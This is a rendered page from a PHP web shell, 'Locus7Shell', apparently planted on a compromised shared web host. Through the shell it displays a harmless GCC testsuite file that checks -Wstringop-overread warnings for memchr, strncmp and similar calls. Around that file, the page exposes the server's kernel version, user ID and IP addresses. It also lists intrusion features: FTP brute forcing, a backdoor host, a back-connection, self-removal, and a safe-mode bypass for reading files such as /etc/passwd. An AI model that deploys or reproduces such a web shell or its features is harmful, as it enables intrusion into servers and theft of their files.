Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     Wstringop-overread-2.c (3.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* Verify -Wstringop-overread is issued for reading more than the maximum
   object size but not for writing.
  { dg-do compile }
  { dg-options "-O2 -Wno-stringop-overflow -ftrack-macro-expansion=0" } */

#define PTRDIFF_MAX   __PTRDIFF_MAX__
#define SIZE_MAX      __SIZE_MAX__

#define NOIPA         __attribute__ ((noipa))

typedef __SIZE_TYPE__ size_t;

void* memchr (const void*, int, size_t);
int memcmp (const void*, const void*, size_t);
void* memcpy (const void*, const void*, size_t);

int strncmp (const char*, const char*, size_t);
char* strncat (char*, const char*, size_t);
char* strncpy (char*, const char*, size_t);
size_t strnlen (const char*, size_t);

void sink (int, ...);
#define sink(...) sink (0, __VA_ARGS__)
#define T(exp)   sink (exp)

NOIPA void test_memchr (const void *p, int x)
{
  size_t dmax = PTRDIFF_MAX;
  size_t smax = SIZE_MAX;

  T (memchr (p, x, dmax));

  T (memchr (p, x, dmax + 1));     // { dg-warning "specified bound \[0-9\]+ exceeds maximum object size" }
  T (memchr (p, x, dmax * 2));     // { dg-warning "specified bound \[0-9\]+ exceeds maximum object size" }
  T (memchr (p, x, smax));         // { dg-warning "\\\[-Wstringop-overread" }
}


NOIPA void test_memcmp (const void *p, const void *q)
{
  size_t dmax = PTRDIFF_MAX;
  size_t smax = SIZE_MAX;

  T (memcmp (p, q, dmax));

  T (memcmp (p, q, dmax + 1));     // { dg-warning "specified bound \[0-9\]+ exceeds maximum object size" }
  T (memcmp (p, q, dmax * 2));     // { dg-warning "specified bound \[0-9\]+ exceeds maximum object size" }
  T (memcmp (p, q, smax));         // { dg-warning "\\\[-Wstringop-overread" }
}


NOIPA void test_memcpy (void *p, const void *q)
{
  size_t dmax = PTRDIFF_MAX;
  size_t smax = SIZE_MAX;

  T (memcpy (p, q, dmax));

  T (memcpy (p, q, dmax + 1));    // -Wstringop-overflow disabled
  T (memcpy (p, q, dmax * 2));    // ditto
  T (memcpy (p, q, smax));        // ditto
}


NOIPA void test_strncmp (const char *p, const char *q)
{
  size_t dmax = PTRDIFF_MAX;
  size_t smax = SIZE_MAX;

  T (strncmp (p, q, dmax));

  T (strncmp (p, q, dmax + 1));   // { dg-warning "specified bound \[0-9\]+ exceeds maximum object size" "strncmp" }
  T (strncmp (p, q, dmax * 2));   // { dg-warning "\\\[-Wstringop-overread" "strncmp" }
  T (strncmp (p, q, smax));       // { dg-warning "\\\[-Wstringop-overread" "strncmp" }
}

NOIPA void test_strncat (char *p, const char *q)
{
  size_t dmax = PTRDIFF_MAX;
  size_t smax = SIZE_MAX;

  T (strncat (p, q, dmax));

  T (strncat (p, q, dmax + 1));   // { dg-warning "specified bound \[0-9\]+ exceeds maximum object size" }
  T (strncat (p, q, dmax * 2));   // { dg-warning "\\\[-Wstringop-overread" }
  T (strncat (p, q, smax));       // { dg-warning "\\\[-Wstringop-overread" }
}

NOIPA void test_strncpy (char *p, const char *q)
{
#if 0
  /* Disabled: strncpy calls with an excissve bound trigger both
     -Wstringop-overflow and, when the former option is disabled,
     -Wstringop-overread.  The latter should probably not trigger.  */

  size_t dmax = PTRDIFF_MAX;
  size_t smax = SIZE_MAX;

  T (strncpy (p, q, dmax));

  T (strncpy (p, q, dmax + 1));    // -Wstringop-overflow disabled
  T (strncpy (p, q, dmax * 2));    // ditto
  T (strncpy (p, q, smax));        // ditto
#endif
}

NOIPA void test_strnlen (const char *p)
{
  size_t dmax = PTRDIFF_MAX;
  size_t smax = SIZE_MAX;

  T (strnlen (p, dmax));

  T (strnlen (p, dmax + 1));      // { dg-warning "specified bound \[0-9\]+ exceeds maximum object size" }
  T (strnlen (p, dmax * 2));      // { dg-warning "\\\[-Wstringop-overread" }
  T (strnlen (p, smax));          // { dg-warning "\\\[-Wstringop-overread" }
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0054 ]--